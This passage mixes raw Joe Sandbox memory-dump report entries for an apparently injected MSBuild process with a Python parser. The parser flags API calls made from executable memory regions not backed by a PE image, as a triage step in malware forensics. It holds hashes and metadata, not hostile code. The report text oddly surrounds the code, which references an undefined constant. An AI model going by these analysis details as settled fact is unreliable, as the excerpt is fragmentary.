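• GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000697), ref: 0695E6BF
Memory Dump Source
• Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
• Instruction ID: 6c8b007a34dad3990cc5fb31e8499301204b60ae42daa1482f7b8497a2be9ed1
• Opcode Fuzzy Hash: 0666da8885e10a4ab5f1cbfdcebc7b97ea31a7b05e24b31b702953ee5d591708
• Instruction Fuzzy Hash: 4B1112B1C0025A9BCB10DF9AC444B9EFBF4AF48320F11812AD918B7640D779A941CFA5
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
Similarity
• API ID:
• String ID: \\VVm
• API String ID: 0-390912563
• Opcode ID: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
• Instruction ID: 5171900ff9970707e93437919e362dcfa335c216c08f34d8e15037970a46b174
• Opcode Fuzzy Hash: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
• Instruction Fuzzy Hash: F6918D70E00349DFDB64CFA8D8817DEBBF2AF48304F268129E605A7394DB749885CB85
"""

API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<sdmp>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
SNAP_RE = re.compile(r"^• Snapshot File: hcaresult_(?P<pid>\d+)_\d+_(?P<base>[0-9a-f]+)_(?P<proc>.+)\.jbxd$")
KV_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int            # absolute address of the call site inside the dump


@dataclass
class Region:
    sdmp: str
    pid: int            # field 1 of the .sdmp name
    base: int           # field 4 of the .sdmp name, must equal Offset
    protect: int        # field 5, ASSUMED to be the page protection
    mem_type: int       # field 7, ASSUMED to be the memory type
    pe_backed: bool     # the "based on PE" flag


@dataclass
class FuncRecord:
    apis: List[ApiCall] = field(default_factory=list)
    region: Optional[Region] = None
    process: str = ""
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


def parse_sdmp_name(sdmp: str, offset: int, pe_backed: bool) -> Region:
    """Split the dotted .sdmp name and check its base against the Offset field."""
    parts = sdmp.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected .sdmp name: {sdmp}")
    base = int(parts[3], 16)
    if base != offset:
        raise ValueError(f"base {base:#x} in name disagrees with Offset {offset:#x}")
    return Region(sdmp, int(parts[0], 16), base, int(parts[4], 16), int(parts[6], 16), pe_backed)


def parse_report(text: str) -> List[FuncRecord]:
    """One FuncRecord per block; a block ends at its Instruction Fuzzy Hash line."""
    records: List[FuncRecord] = []
    cur, in_apis = FuncRecord(), False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            in_apis = True
            continue
        if line == "Memory Dump Source":
            in_apis = False
            continue
        m = API_RE.match(line) if in_apis else None
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.region = parse_sdmp_name(m["sdmp"], int(m["offset"], 16), m["pe"] == "true")
            continue
        m = SNAP_RE.match(line)
        if m:
            cur.process = m["proc"]
            if cur.region and (int(m["pid"]) != cur.region.pid or int(m["base"], 16) != cur.region.base):
                raise ValueError(f"snapshot {line} disagrees with {cur.region.sdmp}")
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"]
        if key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_id = val
        elif key == "Opcode ID":
            cur.opcode_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = val
            records.append(cur)
            cur = FuncRecord()
    return records


def call_rva(call: ApiCall, region: Region) -> int:
    """Offset of the call site from the region base (ref must lie at or above base)."""
    off = call.ref - region.base
    if off < 0:
        raise ValueError(f"ref {call.ref:#x} below region base {region.base:#x}")
    return off


def unbacked_executable_calls(records: List[FuncRecord]):
    """(process, pid, base, api, rva) for calls from executable regions not backed by a PE."""
    out = []
    for r in records:
        reg = r.region
        if reg is None or reg.pe_backed or (reg.protect & 0xFF) not in EXECUTABLE_PROTECTIONS:
            continue
        for c in r.apis:
            out.append((r.process, reg.pid, reg.base, f"{c.name}.{c.module}", call_rva(c, reg)))
    return out


if __name__ == "__main__":
    for proc, pid, base, api, rva in unbacked_executable_calls(parse_report(SAMPLE)):
        print(f"{proc} (pid {pid}) region {base:#010x}, not PE-backed: {api} at +{rva:#x}")
```

Run against a full text export, the same parser gives one record per function block; the regions that carry API calls here (06950000 and 06AA0000, both in process 15, MSBuild) are the ones to dump and scan first, because a call site that resolves to an unbacked region rather than to an on-disk module is the memory-forensic signal a triage script should surface.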
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
                                      • Instruction ID: 5171900ff9970707e93437919e362dcfa335c216c08f34d8e15037970a46b174
                                      • Opcode Fuzzy Hash: 5ab1794ae893be9b889f815b9b5507a14c36211a9d26d014fb7adfd7b0b43753
                                      • Instruction Fuzzy Hash: F6918D70E00349DFDB64CFA8D8817DEBBF2AF48304F268129E605A7394DB749885CB85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 9ea63f5e0bc27cb37a13e5d79fe85a717dcbcf62178fd4dc49dea12261c0086a
                                      • Instruction ID: 3cc9e4ab30c8a0fed37963674eade63d5979a2f7e058f974c1ee35d2cce450b3
                                      • Opcode Fuzzy Hash: 9ea63f5e0bc27cb37a13e5d79fe85a717dcbcf62178fd4dc49dea12261c0086a
                                      • Instruction Fuzzy Hash: 05516B34B002188FDB54DB68C458AAD77B6EF88700F2240A9E506EB7A4CB75EC01CBA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 441be4b376d226db94b9152faf2fb9751340220d690f4141be9c0d3eac44191d
                                      • Instruction ID: cd614573ccd54b27131522a50cecfb1676428c1becde3d93a16841e13009b9ab
                                      • Opcode Fuzzy Hash: 441be4b376d226db94b9152faf2fb9751340220d690f4141be9c0d3eac44191d
                                      • Instruction Fuzzy Hash: E4313031E10209DBEB54CB69C450BDEF7B2EF85310F628426E906EB350EB709D45CB55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 3b0438367741295ab6c0b06dea9ac8d4fecce57eae2e4ca1f3371e1493ace72b
                                      • Instruction ID: 8409518342e185dcc107f16c1d76f9fa973fd53b563419c127cc14d48619a1c4
                                      • Opcode Fuzzy Hash: 3b0438367741295ab6c0b06dea9ac8d4fecce57eae2e4ca1f3371e1493ace72b
                                      • Instruction Fuzzy Hash: AA310D31E10219DBEB54CBA9D450BEEF7B2EF85310F51852AEA06EB340EB709D41CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: 3ba48718b8dd4e12367b51631eae060be66e314b22f3d04e8a029431b27a60c3
                                      • Instruction ID: 4e0f0ffb2c3caa5c4019f9a1038e26a34270742f3476c26b3b335cb53c50e9c0
                                      • Opcode Fuzzy Hash: 3ba48718b8dd4e12367b51631eae060be66e314b22f3d04e8a029431b27a60c3
                                      • Instruction Fuzzy Hash: B001D4317102449FC704AB7D84117AE7BA6EFC6700F1180AAD056CB784DE759C428B96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LRq
                                      • API String ID: 0-3187445251
                                      • Opcode ID: ba58c87ca441b672f1c8a623cc47f9736ac61de1e0292369c756434815b48d6c
                                      • Instruction ID: ff10cbde47e3fddb0af1994f2d19e3541d848022f4064f2b5c294391db96108c
                                      • Opcode Fuzzy Hash: ba58c87ca441b672f1c8a623cc47f9736ac61de1e0292369c756434815b48d6c
                                      • Instruction Fuzzy Hash: 7601D172B002108BC704ABB9C0117ADBBA7EFC9711F1084AED14ACB784DE32DC428B96
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b25df92c7874085f048d66b75b48344f8a34b3f5581c5a9cf76b013e8d2965df
                                      • Instruction ID: 966ca4686e1d57d0c630fe8cbae019c7d4911510e2648a256b5cc931330ef5ec
                                      • Opcode Fuzzy Hash: b25df92c7874085f048d66b75b48344f8a34b3f5581c5a9cf76b013e8d2965df
                                      • Instruction Fuzzy Hash: 96228170B002459FDB65AB38E860A2877A3EBC5311F628939D502CB355DF31EC47DB96
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1874cbbacbd98c02871db48930553629dee12f52843353b03f0209e034546eb
                                      • Instruction ID: df20cfde7acbc22c6aa369ab8daa42e14618cbc8e8521ca6c2cd853b2de1cb42
                                      • Opcode Fuzzy Hash: a1874cbbacbd98c02871db48930553629dee12f52843353b03f0209e034546eb
                                      • Instruction Fuzzy Hash: D7E16135B002049FDB54DB68D894BADBBB2FF88310F268529E90ADB354DB31ED41CB95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63ba6b33fee46ddda0cecff05e65a7de5bbbba0e2861d8c178c27c5e3b23711e
                                      • Instruction ID: bd75d3314a5ade02d38a8c9f9b834389eaddb80bd96a2e2b193d390fc3fe1e47
                                      • Opcode Fuzzy Hash: 63ba6b33fee46ddda0cecff05e65a7de5bbbba0e2861d8c178c27c5e3b23711e
                                      • Instruction Fuzzy Hash: 53A17D71E00209CFDB60CFA9D88179EBBF1AF48318F158529DA19E7394EB749881CF95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a371ba22445e4c64d9a6f10d7692a31308f1c500a7f573aafedfce294259bbae
                                      • Instruction ID: 7a9bb8b7419a2164efe2891a431ec839a1af6450a7c20ff8be5b1925a364130e
                                      • Opcode Fuzzy Hash: a371ba22445e4c64d9a6f10d7692a31308f1c500a7f573aafedfce294259bbae
                                      • Instruction Fuzzy Hash: F9714871A002048FEB54DF69D884B9DBBB6FF88310F15C16AEA09AB395DB71DC45CB90
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbac244633fb4654f2dbb5d039749161a12d3fdcc0cc94cf3666cc0214e7de54
                                      • Instruction ID: 82c193fa172854a6533aded500161b1024d9baea1b6f9d8ce47293fa0a88f023
                                      • Opcode Fuzzy Hash: fbac244633fb4654f2dbb5d039749161a12d3fdcc0cc94cf3666cc0214e7de54
                                      • Instruction Fuzzy Hash: 7761CD72E145298BDB14CF98C8807BDF7F3EB84314F5A8969CA55AB341C334AD84CB99
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6706486efe861b39be4f490e921fec650058c0a1864926dc4743eeea68e39c68
                                      • Instruction ID: a2fc8896977eace5ebb543a4324b36694b019a47f2ec436b210a2732edddf2e8
                                      • Opcode Fuzzy Hash: 6706486efe861b39be4f490e921fec650058c0a1864926dc4743eeea68e39c68
                                      • Instruction Fuzzy Hash: 6641B270B002498FDF64DA68D59076EBBB2EB85310F22482ADA0EDB384DB35DD45CB85
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6791414f9605bd85170d09b57893927d90587d139ab659e78bf52333d5b42d5d
                                      • Instruction ID: 41056bbc4298af06edf3734508aadb0484a3be50acc1c5e155a30bd69dc8f8e1
                                      • Opcode Fuzzy Hash: 6791414f9605bd85170d09b57893927d90587d139ab659e78bf52333d5b42d5d
                                      • Instruction Fuzzy Hash: 26513371D002188FDB14CFAAD885B9EBBB5FF48314F168129E825BB354DB74A844CF94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5554096996250429e9da3027e4d37d67813e284ee1367d64890de362c3723f37
                                      • Instruction ID: 3a01a3113286af5414b98ea3c67251e796d3576240decd008a0ec259ab735bf4
                                      • Opcode Fuzzy Hash: 5554096996250429e9da3027e4d37d67813e284ee1367d64890de362c3723f37
                                      • Instruction Fuzzy Hash: 7B511371D002188FDB54CFA9C884B9EBBF5BF48314F168129E829BB355DB74A844CF99
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6cd4133f89131252dee9f66a56290303b1c1cdc25ee935f1165d3ced831b257
                                      • Instruction ID: d9c1cb3ae2edd3c88ac377ab9056b5ab4173d7ca9102a2af9a9b388a9b00c9ef
                                      • Opcode Fuzzy Hash: f6cd4133f89131252dee9f66a56290303b1c1cdc25ee935f1165d3ced831b257
                                      • Instruction Fuzzy Hash: EC512471D102188FDB54CFA9C884B9EBBF5BF48314F158129E829BB355D774A844CF94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2607495e6cf7c039432780efeaaecab3383807b14c12801dcb2b9b15f6ab2528
                                      • Instruction ID: a4531477a164a9c9722ffb8458480c4f62092c3fd1293954be096a738750d384
                                      • Opcode Fuzzy Hash: 2607495e6cf7c039432780efeaaecab3383807b14c12801dcb2b9b15f6ab2528
                                      • Instruction Fuzzy Hash: 1351A43460128E9FD726FB68F8A0A553F76FB52305B1A4E75D1044B26ED6303A0ACF82
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418022868ba67064f94256870c4eeeb710a54620b91495cea7b914dc48719a32
                                      • Instruction ID: f87f57a09390eceb3bfa846f921fb6a6242323f5155cecf70d78f13d2bd316c8
                                      • Opcode Fuzzy Hash: 418022868ba67064f94256870c4eeeb710a54620b91495cea7b914dc48719a32
                                      • Instruction Fuzzy Hash: AD51643461125E9FC729FFA8F8A0A557F76F751305B1A4E35D2044B26DDA303A0ACF81
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ed36fbf169ef60829f31aa22bc9cfdc5dabe3b12221a158628599d28546d984
                                      • Instruction ID: 5650bc4ac4f8aab430f15729cfba8eaa28c65e811f42ae390df162a25b7abca5
                                      • Opcode Fuzzy Hash: 5ed36fbf169ef60829f31aa22bc9cfdc5dabe3b12221a158628599d28546d984
                                      • Instruction Fuzzy Hash: 0241E0B0D003499FEB14CFA9C984ADEBBF1BF48314F148129E919AB350DB759946CF94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd535d3e3979304a787f72a9b93f149642bc1f9bb81153283000e10ee8556e3d
                                      • Instruction ID: 9df76d84d97f4eacee21fb8f95e1a3100572b5c1bdc1150bb6824d7593f739e7
                                      • Opcode Fuzzy Hash: cd535d3e3979304a787f72a9b93f149642bc1f9bb81153283000e10ee8556e3d
                                      • Instruction Fuzzy Hash: 3E315C30B00214DFDB58EB64E5647AD73B2AF48345F620468D605EB394DB35DC42CB98
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1de148d18ea96300c7f9fa7205d21beb78f98ee7210c0a4c4debf652294ecf8c
                                      • Instruction ID: 91e3b39e51f718f1dadce35e7803154f791b82afd7b8020f7704a0ed8046e92c
                                      • Opcode Fuzzy Hash: 1de148d18ea96300c7f9fa7205d21beb78f98ee7210c0a4c4debf652294ecf8c
                                      • Instruction Fuzzy Hash: D941EFB0D0034D9FEB14DFA9C984A9EBBB5BF48314F108029E919AB350DB75A946CF94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea44ff299ed89983eb5537e87b29ff1258cf1c8c3d8214f701c7d2f9b33666b0
                                      • Instruction ID: 3f231e8f7cf8bbcfab03b51860ec58c416823d0f88ad1167ba1685140be7322f
                                      • Opcode Fuzzy Hash: ea44ff299ed89983eb5537e87b29ff1258cf1c8c3d8214f701c7d2f9b33666b0
                                      • Instruction Fuzzy Hash: 43313C34A00214DFDB58EB74E5606AD77B2AB48345F620468D605EB394DB36DC41CBA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20acbffb05ddbf2a11c1c65912252c08d0a74f8247fbf6c274cd58f6ff970bf4
                                      • Instruction ID: 1a1c004c7d9eda61142cc7c221b829019d6bb122103dd154cbf775d15820a9fb
                                      • Opcode Fuzzy Hash: 20acbffb05ddbf2a11c1c65912252c08d0a74f8247fbf6c274cd58f6ff970bf4
                                      • Instruction Fuzzy Hash: E6317130E106099BDB45CF64D854BAAFBB2BF85310F12C629E919EB344DB70DC46CB81
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb9f865e069ed84942151c3170dec8204fb83a0df1debc221b6aada565073101
                                      • Instruction ID: 250f9f334d523fbaa0e3033779397a4bfbcd828934966bbc4f2666b89cf15437
                                      • Opcode Fuzzy Hash: eb9f865e069ed84942151c3170dec8204fb83a0df1debc221b6aada565073101
                                      • Instruction Fuzzy Hash: CB217130E102099BDB45CF65D850B9EF7B2EF89300F11C529E909AB344EB70DC46CB94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fab449714dc985ea905980f67570d63ff3c1aa49db02e71501a19d0ebdd69939
                                      • Instruction ID: e4c6c981259891f6ba1e63c2f9b4e7f49f44c0af1cfe334855809e3e4b33f6e0
                                      • Opcode Fuzzy Hash: fab449714dc985ea905980f67570d63ff3c1aa49db02e71501a19d0ebdd69939
                                      • Instruction Fuzzy Hash: E3219130E002159BDB18CFA5D450ADEF7B2FF89310F21862AE915BB384DB71AD45CB54
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7991b65114a3b7b5f273bc1ba9529853d16dc673265c91350a941cf835cf044b
                                      • Instruction ID: 2a793c674f5dbf8ef117455561bc7e61c2ed13be19fee36aa4282497736ac902
                                      • Opcode Fuzzy Hash: 7991b65114a3b7b5f273bc1ba9529853d16dc673265c91350a941cf835cf044b
                                      • Instruction Fuzzy Hash: AA213B38600205CFDF65EB28F894B593B5AEB40701F224926E10ECB35CDB30EC45CB86
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31759584f8806ad9b7855d5e6c34917e8e002bd372f438a9adc8c776dc38fa5c
                                      • Instruction ID: 5f9629b0ef071b6bdbf3824c58b042d6de2ebb28f6790e44523d277e8fa7cf54
                                      • Opcode Fuzzy Hash: 31759584f8806ad9b7855d5e6c34917e8e002bd372f438a9adc8c776dc38fa5c
                                      • Instruction Fuzzy Hash: 4F217C30B00244DFDB54DB78C5647AD77F2EB89204F220469D60AEB360DB32CD41CBA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d1aeef46be53f226ad357cec68306da3018c017ebee1b670081ef1ee02b073c7
                                      • Instruction ID: 81d353697a4b0ec2b14178694324be3bb7d56788f95403ba0425fd387084f31e
                                      • Opcode Fuzzy Hash: d1aeef46be53f226ad357cec68306da3018c017ebee1b670081ef1ee02b073c7
                                      • Instruction Fuzzy Hash: 7C211734A002059FDB54EB78D568B9DB7F1EF89305F214468E606EB3A5DB329C01CBA5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508271077.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2cfd000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10f96efcb8e323dd515b765bd0fd97159bd4077e8b6b4ff6b9f3802733a04e90
                                      • Instruction ID: ceb0ef745bf20f3dbb2771851792a3878c898ce484604f900f45cc3465ad1dc0
                                      • Opcode Fuzzy Hash: 10f96efcb8e323dd515b765bd0fd97159bd4077e8b6b4ff6b9f3802733a04e90
                                      • Instruction Fuzzy Hash: 7B213471604300DFDB94DF10D9C0B26BBA5FB84314F20C56DDA0A4B682C736D847CAA2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c77fb154ad956fd30382e04f59202501d59ccf7eac2d211489c238f114207c73
                                      • Instruction ID: d1f92cee9c680d6a49cb6a866d1fd3507f2db8c6e7d06bfd775f854e09a4091d
                                      • Opcode Fuzzy Hash: c77fb154ad956fd30382e04f59202501d59ccf7eac2d211489c238f114207c73
                                      • Instruction Fuzzy Hash: 7A21D370A00205CBEFB96625E18937C3B96E786715F12082AE64EC7780DB79DC85C78B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18ee4ba834c6c69551b20a1695fc6981b8644215788b32c0ff1a274bb9357332
                                      • Instruction ID: b9c7d959163647fe18e45c7e0f9ee5cf917bfbb6a9d01e6bbc3c261fbeb6f922
